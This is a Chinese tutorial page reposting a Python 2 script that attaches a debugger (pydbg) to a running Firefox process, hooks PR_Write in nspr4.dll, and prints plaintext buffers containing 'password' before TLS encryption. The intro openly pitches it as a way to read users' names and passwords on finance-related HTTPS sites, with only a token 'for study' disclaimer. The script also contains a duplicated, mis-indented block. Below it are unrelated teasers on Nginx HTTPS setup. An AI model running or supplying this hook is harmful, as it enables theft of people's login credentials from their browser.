python利用hook技术破解https的实例代码-Python教程-PHP中文网

首页

后端开发

Python教程

python利用hook技术破解https的实例代码

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 06, 2016 am 11:27 AM

hookhttps

相对于http协议，http是的特点就是他的安全性，http协议的通信内容用普通的嗅探器可以捕捉到，但是https协议的内容嗅探到的是加密后的内容，对我们的利用价值不是很高，所以一些大的网站----涉及到“大米”的网站，采用的都是http是协议，嘿嘿，即便这样，还是有办法能看到他的用户名和密码的，嘿嘿，本文只是用于技术学习，只是和大家交流技术，希望不要用于做违法的事情，这个例子是在firefox浏览器下登录https协议的网站，我们预先打开程序，就来了个捕获用户名和密码：

下面是源代码：

代码如下:

#!/ur/bin/env python
from pydbg import *
from pydbg.defines import *

import utils
import sys

dbg = pydbg()
found_firefox = False

pattern = "password"


def ssl_sniff( dbg, args ):
    buffer = ""
    offset = 0

    while 1:
        byte = dbg.read_process_memory( args[1] + offset, 1 )
        if byte != "x00":
            buffer += byte
            offset += 1
            continue
        else:
            break
    if pattern in buffer:
        print "Pre-Encrypted: %s" % buffer
    return DBG_CONTINUE
# 寻找firefox.exe的进程
for (pid, name) in dbg.enumerate_processes():
    if name.lower() == "firefox.exe":
        found_firefox = True
        hooks = utils.hook_container()
        dbg.attach(pid)
        print "[*] Attaching to firefox.exe with PID: %d" % pid
# 得到firefox的hook的 address
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")
        if hook_address:
# 添加hook的内容，包括他的pid，地址，嗅探类型

            hooks.add( dbg, hook_address, 2, ssl_sniff, None )
            print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address
            break
        else:
            print "[*] Error: Couldn't resolve hook address."
            sys.exit(-1)
        if found_firefox:
            print "[*] Hooks set, continuing process."
            dbg.run()
        else:
                print "[*] Error: Couldn't find the firefox.exe process."
                sys.exit(-1)

if found_firefox:
    print "[*] Hooks set, continuing process."
    dbg.run()
else:
    print "[*] Error: Couldn't find the firefox.exe process."
    sys.exit(-1)

转自：http://world77.blog.bitsCN.com/414605/518679

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

Nginx与SSL：配置HTTPS保护Web服务器Jun 09, 2023 pm 09:24 PM

Nginx是一个高性能的Web服务器软件，同时也是一款强大的反向代理服务器和负载均衡器。随着互联网的迅速发展，越来越多的网站开始采用SSL协议保护敏感用户数据，而Nginx也提供了强大的SSL支持，使得Web服务器的安全性能更进一步。本文将介绍如何配置Nginx以支持SSL协议，并保护Web服务器的安全性能。什么是SSL协议？SSL（SecureSocke

vue3 hook怎么重构DataV的全屏容器组件May 16, 2023 pm 02:43 PM

实现创建组件fullScreenContainer.vueimport{useAutoResize}from'@/hooks/useAutoResize'const{autoBindRef}=useAutoResize()自定义一个hook，导出一个autoBindRef绑定ref自定义hook文件useAutoResize.tsimport{ref}from'vue';exportfunctionuseAutoResize(){l

Nginx防火墙如何保障HTTPS安全通信Jun 10, 2023 am 10:16 AM

在当今互联网时代，安全通信已经成为了不可或缺的一部分。尤其是在HTTPS通信中，如何保障其安全性尤为重要。而Nginx作为流行的Web服务器和反向代理服务器，其防火墙也可以在保障HTTPS安全通信中发挥重要作用。本文将就Nginx防火墙从以下几个方面进行讨论。TLS/SSL加密HTTPS通信的安全保障主要是基于TLS/SSL加密技术，其能够防止数据在传输过程

怎么使用Nginx实现HTTPS双向验证Jun 03, 2023 pm 08:38 PM

单向验证与双向验证的区别：单向验证：指客户端验证服务器端证书，服务器并不需要验证客户端证书。双向验证：指客户端验证服务器端证书，而服务器也需要通过ca的公钥证书来验证客户端证书。详细的握手过程：单向验证浏览器发送一个连接请求给安全服务器。1、服务器将自己的证书，以及同证书相关的信息发送给客户浏览器。2、客户浏览器检查服务器送过来的证书是否是由自己信赖的ca中心所签发的。如果是，就继续执行协议；如果不是，客户浏览器就给客户一个警告消息：警告客户这个证书不是可以信赖的询问客户是否需要继续。3、接着客

Nginx下如何升级httpsMay 14, 2023 pm 04:49 PM

下载证书在证书控制台下载nginx版本证书。下载到本地的压缩文件包解压后包含：.pem文件：证书文件.key文件：证书的私钥文件（申请证书时如果没有选择自动创建csr，则没有该文件）配置nginx1、在nginx的安装目录下创建cert目录，并且将下载的全部文件拷贝到cert目录中，如果申请证书时是自己创建的csr文件，请将对应的私钥文件放到cert目录下。2、打开nginx安装目录下conf目录中的nginx.conf文件#usernobody;worker_processes1;#error

Java API 开发中使用 Https 进行数据传输Jun 18, 2023 pm 10:43 PM

随着科技的发展，网络通信已经成为了现代社会信息传输的重要工具之一。但同时，网络上的信息传输面临着被恶意攻击和窃取的风险，因此安全性显得尤为重要。基于此，HTTPS协议就应运而生。它是在HTTP协议上加入SSL/TLS加密的方式来保证网络传输安全性的一种协议。Java作为一门广泛应用于网络开发的语言，自然也提供了丰富的API来支持HTTPS协议。本文将

nginx如何让浏览器强制跳转HTTPS访问May 15, 2023 pm 02:34 PM

效果可以看如下：但是如果我们现在使用http来访问的话，访问不了。如下图所示：因此我现在首先要做的是使用nginx配置下，当用户在浏览器下输入http请求的时候使用nginx重定向到https下即可。因此我们现在需要做一个简单的nginx重定向功能。因此在我们的nginx中需要加如下重定向配置：server{listenxxx.abc.com;server_namexxx.abc.com;rewrite^/(.*)$https://$host$1permanent;}因此nginx主要的配置代码

nginx如何配置SSL证书实现https服务May 15, 2023 pm 03:25 PM

假如我现在node基本架构如下：|----项目||---static#存放html文件|||---index.html#index.html||---node_modules#依赖包||---app.js#node入口文件||---package.json||---.babelrc#转换es6文件index.html文件代码如下：nginx配置https欢迎使用https来访问页面app.js代码如下：constkoa=require('koa');constfs

See all articles